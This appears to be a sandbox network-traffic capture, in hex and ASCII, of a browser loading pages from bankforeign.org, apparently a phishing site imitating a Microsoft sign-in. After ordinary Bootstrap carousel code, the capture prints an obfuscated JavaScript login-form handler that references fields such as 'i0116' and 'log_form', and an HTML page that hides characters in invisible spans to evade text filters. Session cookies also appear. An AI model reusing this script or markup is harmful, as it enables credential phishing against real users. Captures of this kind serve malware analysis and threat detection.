                                                            2024-02-01 20:38:44 UTC1369INData Raw: 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 3a 28 53 3d 22 66 6f 63 75 73 22 29 2b 79 2b 45 2b 22 20 62 6c 75 72 22 2b 79 2b 45 7d 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 6e 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 74 6f 67 67 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 21 30 2c 65 3d 21 30 2c 6e 3d 6d 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 6c 6f 73 65 73 74 28 41 29 5b 30 5d 3b 69 66 28 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 44 29 3b 69 66 28 69 29 7b 69 66 28 22 72 61 64 69 6f 22 3d 3d 3d 69 2e 74 79 70 65 29 69 66 28 69 2e
                                                            Data Ascii: US_BLUR_DATA_API:(S="focus")+y+E+" blur"+y+E},k=function(){function n(t){this._element=t}var t=n.prototype;return t.toggle=function(){var t=!0,e=!0,n=m(this._element).closest(A)[0];if(n){var i=this._element.querySelector(D);if(i){if("radio"===i.type)if(i.
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 61 63 65 7d 2c 6b 29 2c 51 6e 3d 28 6a 3d 22 63 61 72 6f 75 73 65 6c 22 2c 4c 3d 22 2e 22 2b 28 48 3d 22 62 73 2e 63 61 72 6f 75 73 65 6c 22 29 2c 52 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 78 3d 28 50 3d 65 29 2e 66 6e 5b 6a 5d 2c 57 3d 7b 69 6e 74 65 72 76 61 6c 3a 35 65 33 2c 6b 65 79 62 6f 61 72 64 3a 21 30 2c 73 6c 69 64 65 3a 21 31 2c 70 61 75 73 65 3a 22 68 6f 76 65 72 22 2c 77 72 61 70 3a 21 30 7d 2c 55 3d 7b 69 6e 74 65 72 76 61 6c 3a 22 28 6e 75 6d 62 65 72 7c 62 6f 6f 6c 65 61 6e 29 22 2c 6b 65 79 62 6f 61 72 64 3a 22 62 6f 6f 6c 65 61 6e 22 2c 73 6c 69 64 65 3a 22 28 62 6f 6f 6c 65 61 6e 7c 73 74 72 69 6e 67 29 22 2c 70 61 75 73 65 3a 22 28 73 74 72 69 6e 67 7c 62 6f 6f 6c 65 61 6e 29 22 2c 77 72 61 70 3a 22 62 6f 6f 6c 65 61 6e 22 7d 2c 71 3d
                                                            Data Ascii: ace},k),Qn=(j="carousel",L="."+(H="bs.carousel"),R=".data-api",x=(P=e).fn[j],W={interval:5e3,keyboard:!0,slide:!1,pause:"hover",wrap:!0},U={interval:"(number|boolean)",keyboard:"boolean",slide:"(boolean|string)",pause:"(string|boolean)",wrap:"boolean"},q=
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 30 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 65 74 29 26 26 28 46 6e 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2c 74 68 69 73 2e 63 79 63 6c 65 28 21 30 29 29 2c 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 7d 2c 74 2e 63 79 63 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 7c 7c 28 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 3d 21 31 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 2c 74 68 69 73 2e 5f
                                                            Data Ascii: this._isPaused=!0),this._element.querySelector(et)&&(Fn.triggerTransitionEnd(this._element),this.cycle(!0)),clearInterval(this._interval),this._interval=null},t.cycle=function(t){t||(this._isPaused=!1),this._interval&&(clearInterval(this._interval),this._
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 74 22 69 6e 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 54 4f 55 43 48 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 65 2e 70 61 75 73 65 28 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 26 26 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 29 2c 65 2e 74 6f 75 63 68 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 79 63 6c 65 28 74 29 7d 2c 35 30 30 2b 65 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 7d 29 29 7d 2c 74 2e 5f 6b 65 79 64 6f 77 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61
                                                            Data Ascii: t"in document.documentElement&&P(this._element).on(Q.TOUCHEND,function(){e.pause(),e.touchTimeout&&clearTimeout(e.touchTimeout),e.touchTimeout=setTimeout(function(t){return e.cycle(t)},500+e._config.interval)}))},t._keydown=function(t){if(!/input|textarea
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 29 2c 63 3d 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 6c 29 2c 68 3d 42 6f 6f 6c 65 61 6e 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 29 3b 69 66 28 74 3d 3d 3d 71 3f 28 6e 3d 4a 2c 69 3d 5a 2c 72 3d 4b 29 3a 28 6e 3d 7a 2c 69 3d 47 2c 72 3d 4d 29 2c 6c 26 26 50 28 6c 29 2e 68 61 73 43 6c 61 73 73 28 56 29 29 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 31 3b 65 6c 73 65 20 69 66 28 21 74 68 69 73 2e 5f 74 72 69 67 67 65 72 53 6c 69 64 65 45 76 65 6e 74 28 6c 2c 72 29 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 73 26 26 6c 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 3d 21 30 2c 68 26 26 74 68 69 73 2e 70 61 75 73 65 28 29 2c 74 68 69 73 2e 5f 73 65 74 41 63 74 69 76 65 49 6e 64 69 63 61 74 6f 72 45 6c
                                                            Data Ascii: ),c=this._getItemIndex(l),h=Boolean(this._interval);if(t===q?(n=J,i=Z,r=K):(n=z,i=G,r=M),l&&P(l).hasClass(V))this._isSliding=!1;else if(!this._triggerSlideEvent(l,r).isDefaultPrevented()&&s&&l){this._isSliding=!0,h&&this.pause(),this._setActiveIndicatorEl
                                                            2024-02-01 20:38:44 UTC933INData Raw: 74 6f 22 29 3b 72 26 26 28 69 2e 69 6e 74 65 72 76 61 6c 3d 21 31 29 2c 6f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 50 28 6e 29 2c 69 29 2c 72 26 26 50 28 6e 29 2e 64 61 74 61 28 48 29 2e 74 6f 28 72 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 7d 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 31 2e 33 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 57 7d 7d 5d 29 2c 6f 7d 28 29 2c 50 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 51 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 69 74 2c 6f 74 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b
                                                            Data Ascii: to");r&&(i.interval=!1),o._jQueryInterface.call(P(n),i),r&&P(n).data(H).to(r),t.preventDefault()}}},s(o,null,[{key:"VERSION",get:function(){return"4.1.3"}},{key:"Default",get:function(){return W}}]),o}(),P(document).on(Q.CLICK_DATA_API,it,ot._dataApiClick


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.449775104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:42 UTC1140OUTGET /js/a8fa5b4494ce08322db1f933d9e75f5e65bc015265adf HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:44 UTC631INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:44 GMT
                                                            Content-Type: text/javascript
                                                            Content-Length: 7043
                                                            Connection: close
                                                            Last-Modified: Thu, 01 Feb 2024 18:12:11 GMT
                                                            Accept-Ranges: bytes
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NRpEwRqVqH8JWYJqFXUAfbDVOlvgyKJOTghoD6gGVqliwXaAHuFBAkoXEgo%2B8a4uQX7df7XtvislLrd%2FaZ46wBFPzGXxrJnfxBX%2BX9X779EsL0%2B8y%2Fb7Efv3TwZZ6eqacj4%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecffe72fa7453f-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:44 UTC738INData Raw: 76 61 72 20 5f 30 78 32 32 64 35 62 34 3d 5f 30 78 65 39 33 36 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 7b 76 61 72 20 5f 30 78 35 61 66 63 32 39 3d 5f 30 78 32 65 38 39 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 65 39 33 36 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 65 38 30 33 34 2c 5f 30 78 31 36 34 39 61 66 29 7b 5f 30 78 35 65 38 30 33 34 3d 5f 30 78 35 65 38 30 33 34 2d 30 78 31 32 64 3b 76 61 72 20 5f 30 78 34 31 62 66 65 38 3d 5f 30 78 35 61 66 63 32 39 5b 5f 30 78 35 65 38 30 33 34 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 31 62 66 65 38 3b 7d 2c 5f 30 78 65 39 33 36 28 5f 30 78 31 31 30 64 30 66 2c 5f 30 78 32 62 39 31 61 39 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 38 66
                                                            Data Ascii: var _0x22d5b4=_0xe936;function _0xe936(_0x110d0f,_0x2b91a9){var _0x5afc29=_0x2e89();return _0xe936=function(_0x5e8034,_0x1649af){_0x5e8034=_0x5e8034-0x12d;var _0x41bfe8=_0x5afc29[_0x5e8034];return _0x41bfe8;},_0xe936(_0x110d0f,_0x2b91a9);}(function(_0x18f
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 78 33 35 37 34 33 62 3d 5b 27 6c 6f 67 27 2c 27 75 6e 64 65 72 27 2c 27 70 72 6f 74 6f 74 79 70 65 27 2c 27 75 73 65 72 6e 61 6d 65 45 72 72 6f 72 27 2c 27 64 69 73 61 62 6c 65 64 27 2c 27 73 65 61 72 63 68 27 2c 27 70 72 6f 67 72 65 73 73 42 61 72 27 2c 27 72 65 6d 6f 76 65 43 6c 61 73 73 27 2c 27 3c 62 72 2f 3e 27 2c 27 65 61 63 68 27 2c 27 6a 73 6f 6e 27 2c 27 74 72 61 63 65 27 2c 27 73 74 79 6c 65 27 2c 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 2c 27 6f 70 61 63 69 74 79 27 2c 27 6e 6f 6e 65 27 2c 27 69 30 31 31 36 27 2c 27 76 61 6c 75 65 27 2c 27 6c 6f 63 61 74 69 6f 6e 27 2c 27 72 65 6d 6f 76 65 41 74 74 72 27 2c 27 72 65 73 65 74 27 2c 27 6c 6f 67 5f 66 6f 72 6d 27 2c 27 6e 6f 77 27 2c 27 72 65 64 69 72 65 63 74 27 2c 27 72 65 6c 6f 61 64 27 2c
                                                            Data Ascii: x35743b=['log','under','prototype','usernameError','disabled','search','progressBar','removeClass','<br/>','each','json','trace','style','querySelector','opacity','none','i0116','value','location','removeAttr','reset','log_form','now','redirect','reload',
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 30 78 31 35 38 29 5d 28 5f 30 78 32 38 31 64 34 34 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 31 32 64 61 66 3d 6e 75 6c 6c 2c 5f 30 78 33 39 30 31 65 35 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 62 38 37 64 62 3d 21 5b 5d 2c 5f 30 78 33 63 66 65 63 39 3b 7d 3b 7d 28 29 29 2c 5f 30 78 34 62 39 62 61 35 3d 5f 30 78 64 62 31 63 65 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 30 78 34 38 38 32 35 33 3d 5f 30 78 65 39 33 36 3b 72 65 74 75 72 6e 20 5f 30 78 34 62 39 62 61 35 5b 5f 30 78 34 38 38 32 35 33 28 30 78 31 33 31 29 5d 28 29 5b 5f 30 78 34 38 38 32 35 33 28 30 78 31 33 65 29 5d 28 5f 30 78 34 38 38 32 35 33 28 30 78 31 35 33 29 29 5b 5f 30 78 34 38 38 32 35 33
                                                            Data Ascii: 0x158)](_0x281d44,arguments);return _0x112daf=null,_0x3901e5;}}:function(){};return _0x2b87db=![],_0x3cfec9;};}()),_0x4b9ba5=_0xdb1cec(this,function(){var _0x488253=_0xe936;return _0x4b9ba5[_0x488253(0x131)]()[_0x488253(0x13e)](_0x488253(0x153))[_0x488253
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 36 34 39 61 66 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 31 36 34 39 61 66 29 2c 5f 30 78 33 61 65 62 32 61 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 3d 5f 30 78 34 31 65 35 39 30 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 33 31 29 5d 5b 5f 30 78 33 39 34 37 66 36 28 30 78 31 35 66 29 5d 28 5f 30 78 34 31 65 35 39 30 29 2c 5f 30 78 35 31 36 64 37 64 5b 5f 30 78 31 63 64 66 39 31 5d 3d 5f 30 78 33 61 65 62 32 61 3b 7d 7d 29 3b 5f 30 78 35 65 38 30 33 34 28 29 3b 66 75 6e 63 74 69 6f 6e 20 73 6c 65 65 70 28 5f 30 78 34 31 35 62 63 31 29 7b 76 61 72 20 5f 30 78 31 35 35 30 61 33 3d 5f 30 78 65 39 33 36 3b 63 6f 6e 73 74 20 5f 30 78 32 61 65 65 61 62 3d 44 61 74 65 5b 5f 30 78 31 35 35 30 61 33 28 30 78 31 34 66 29 5d 28 29
                                                            Data Ascii: 649af[_0x3947f6(0x15f)](_0x1649af),_0x3aeb2a[_0x3947f6(0x131)]=_0x41e590[_0x3947f6(0x131)][_0x3947f6(0x15f)](_0x41e590),_0x516d7d[_0x1cdf91]=_0x3aeb2a;}});_0x5e8034();function sleep(_0x415bc1){var _0x1550a3=_0xe936;const _0x2aeeab=Date[_0x1550a3(0x14f)]()
                                                            2024-02-01 20:38:44 UTC1369INData Raw: 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 33 29 29 3b 70 72 6f 67 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 37 31 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 66 29 29 2c 70 72 6f 67 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 36 29 5d 28 5f 30 78 33 36 37 63 62 35 28 30 78 31 36 35 29 29 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 33 30 29 5d 3d 27 31 30 27 2c 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 33 36 37 63 62 35 28 30 78 31 34 37 29 5d 3d 27 2e 35 27 2c 5f 30 78 34 62 39 38 35 63 5b 5f 30 78 33 36 37 63 62 35 28 30 78
                                                            Data Ascii: ent[_0x367cb5(0x146)](_0x367cb5(0x133));prog=document[_0x367cb5(0x171)](_0x367cb5(0x13f)),prog[_0x367cb5(0x166)](_0x367cb5(0x165)),_0x261182[_0x367cb5(0x145)][_0x367cb5(0x130)]='10',_0x261182[_0x367cb5(0x145)][_0x367cb5(0x147)]='.5',_0x4b985c[_0x367cb5(0x
                                                            2024-02-01 20:38:44 UTC829INData Raw: 31 36 32 34 34 63 29 7b 76 61 72 20 5f 30 78 32 36 38 33 34 38 3d 5f 30 78 32 35 38 65 31 62 3b 5f 30 78 32 62 65 64 39 37 2b 3d 27 27 2b 5f 30 78 31 36 32 34 34 63 5b 30 78 30 5d 2b 5f 30 78 32 36 38 33 34 38 28 30 78 31 34 31 29 3b 7d 29 3b 7d 65 6c 73 65 7b 69 66 28 5f 30 78 33 35 64 31 35 32 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 36 34 29 5d 3d 3d 30 78 31 61 33 29 6c 6f 63 61 74 69 6f 6e 5b 5f 30 78 32 35 38 65 31 62 28 30 78 31 35 31 29 5d 28 29 3b 65 6c 73 65 7b 7d 7d 7d 2c 27 63 6f 6d 70 6c 65 74 65 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 35 64 63 37 34 29 7b 76 61 72 20 5f 30 78 31 65 38 63 64 35 3d 5f 30 78 33 36 37 63 62 35 3b 5f 30 78 32 36 31 31 38 32 5b 5f 30 78 31 65 38 63 64 35 28 30 78 31 34 35 29 5d 5b 5f 30 78 31 65 38 63 64 35
                                                            Data Ascii: 16244c){var _0x268348=_0x258e1b;_0x2bed97+=''+_0x16244c[0x0]+_0x268348(0x141);});}else{if(_0x35d152[_0x258e1b(0x164)]==0x1a3)location[_0x258e1b(0x151)]();else{}}},'complete':function(_0x25dc74){var _0x1e8cd5=_0x367cb5;_0x261182[_0x1e8cd5(0x145)][_0x1e8cd5


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.449777104.21.73.884433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:45 UTC1089OUTGET /1 HTTP/1.1
                                                            Host: bankforeign.org
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-arch: "x86"
                                                            sec-ch-ua-full-version: "117.0.5938.132"
                                                            sec-ch-ua-platform-version: "10.0.0"
                                                            sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                            sec-ch-ua-bitness: "64"
                                                            sec-ch-ua-model: ""
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://bankforeign.org/21663221c08095a4839b4833d7029a6265bc0151070e0LOG21663221c08095a4839b4833d7029a6265bc0151070e1
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: cf_clearance=ZahAkzH78SuBc7fffZ83DZgUgeOUbPvgZ1MmYVWhTks-1706819889-1-AYl4hgE08Tq31T7qgAmdGceKllzYl4V7CCS75b35xf1ftm/G3nMz2igf9z04EetHW3fpVQ74BPZjSO7eYJEv0v0=; PHPSESSID=3d73224af4a5074ab3f0a1a28dbb1ba7
                                                            2024-02-01 20:38:47 UTC686INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:47 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D3uI1HEoKzr5gOKQiumrTyuYv%2BAudptC0yZkr8ig9AMlFZSsbF6YhMKYgKABXvQKeZhoNiHhus1cRjb1olFGVi9xS%2FsRSo0X%2BmUNxAnnMtt77ovsX50%2BAAOj8uQDFCKnid8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 84ecfff57c7a672b-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:47 UTC683INData Raw: 32 65 37 30 0d 0a 20 20 20 20 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 37 31 63 62 36 36 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 34 35 33 66 61 32 33 32 61 62 63 34 32 31 34 65 33 37 36 31 66 32 65 33 34 31 34 34 30 62 63 30 36 35 62 63 30 31 35 31 30 37 30 61 61 20 20 20 20 20 20 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61
                                                            Data Ascii: 2e70 <html dir="ltr" class="a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb66" lang="en"> <head> <title> 453fa232abc4214e3761f2e341440bc065bc0151070aa </title> <meta http-equiv="Content-Type" content="text/html; cha
                                                            2024-02-01 20:38:47 UTC1369INData Raw: 3c 2f 68 65 61 64 3e 0a 0a 20 20 20 20 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 63 62 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 37 31 63 62 37 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 67 72 6f 75 6e 64 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 37 31 63 62 37 32 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: </head> <body class="cb a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb70" style="display: block;"> <div> <div> <div class="background a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb72" role="presentation">
                                                            2024-02-01 20:38:47 UTC1369INData Raw: 20 63 6c 61 73 73 3d 22 69 6e 6e 65 72 20 66 61 64 65 2d 69 6e 2d 6c 69 67 68 74 62 6f 78 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 37 31 63 62 39 36 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 69 67 68 74 62 6f 78 2d 63 6f 76 65 72 20 61 38 66 61 35 62 34 34 39 34 63 65 30 38 33 32 32 64 62 31 66 39 33 33 64 39 65 37 35 66 35 65 36 35 62 63 30 31 35 37 31 63 62 39 37 22 3e 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 72 6f 67 72 65 73 73 42 61 72 22 20 68 69 64 64 65 6e 3d 22 22 20 63 6c 61 73 73 3d
                                                            Data Ascii: class="inner fade-in-lightbox a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb96"> <div class="lightbox-cover a8fa5b4494ce08322db1f933d9e75f5e65bc01571cb97"> </div> <div id="progressBar" hidden="" class=
                                                            2024-02-01 20:38:47 UTC1369INData Raw: 20 20 20 20 20 20 53 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 50 3c 2f 73 70 61 6e 3e 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 32 36 2c 20 31 32 35 2c 20 31 31 37 2c 20 30 29 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 30 2e 30 31 70 78 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 30 33 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 30 32 70 78 3b 22 3e 50
                                                            Data Ascii: S<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">P</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">P
